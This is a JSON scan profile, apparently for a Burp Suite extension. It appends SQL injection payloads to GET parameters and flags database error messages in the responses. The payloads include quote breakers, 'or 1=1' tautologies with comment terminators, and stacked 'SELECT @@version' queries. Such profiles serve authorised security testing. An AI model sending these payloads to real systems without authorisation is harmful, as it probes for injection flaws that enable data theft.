[
  {
    "ProfileName": "SQLi - GET append",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@MrW0l05zyn",
    "Payloads": [
      "true,\u0027",
      "true,\"",
      "true, or 1\u003d1",
      "true,\u0027 or 1\u003d1",
      "true,\" or 1\u003d1",
      "true, or 1\u003d1--",
      "true,\u0027 or 1\u003d1--",
      "true,\" or 1\u003d1--",
      "true, or 1\u003d1-- -",
      "true,\u0027 or 1\u003d1-- -",
      "true,\" or 1\u003d1-- -",
      "true,\u0027 or \u0027x\u0027\u003d\u0027x",
      "true,\" or \"x\"\u003d\"x",
      "true,\u0027) or 1\u003d1--",
      "true,\") or 1\u003d1--",
      "true,\u0027) or 1\u003d1-- -",
      "true,\") or 1\u003d1-- -",
      "true,\u0027) or (\u0027x\u0027)\u003d(\u0027x",
      "true,\") or (\"x\")\u003d(\"x",
      "true, or true",
      "true,\u0027 or true",
      "true,\" or true",
      "true, or true--",
      "true,\u0027 or true--",
      "true,\" or true--",
      "true, or true-- -",
      "true,\u0027 or true-- -",
      "true,\" or true-- -",
      "true,))",
      "true,\u0027))",
      "true,\"))",
      "true,))--",
      "true,\u0027))--",
      "true,\"))--",
      "true,))-- -",
      "true,\u0027))-- -",
      "true,\"))-- -",
      "true,;SELECT version()",
      "true,;SELECT @@version",
      "true,;SELECT version();",
      "true,;SELECT @@version;",
      "true,;SELECT version();--",
      "true,;SELECT @@version;--"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,MySQL",
      "true,Or,SQL Server",
      "true,Or,PostgreSQL",
      "true,Or,Oracle",
      "true,Or,You have an error in your SQL syntax",
      "true,Or,SyntaxError",
      "true,Or,DatabaseError",
      "true,Or,ODBC Driver"
    ],
    "Tags": [
      "All",
      "MrW0l05zyn",
      "MrW0l05zyn - SQLi"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "SQLi - GET append",
    "IssueSeverity": "High",
    "IssueConfidence": "Tentative",
    "IssueDetail": "\u003cbr /\u003e\n\u003cul\u003e\n\u003cli\u003ePayload: \u003ccode\u003e\u003cpayload\u003e\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eGrep: \u003ccode\u003e\u003cgrep\u003e\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      0
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]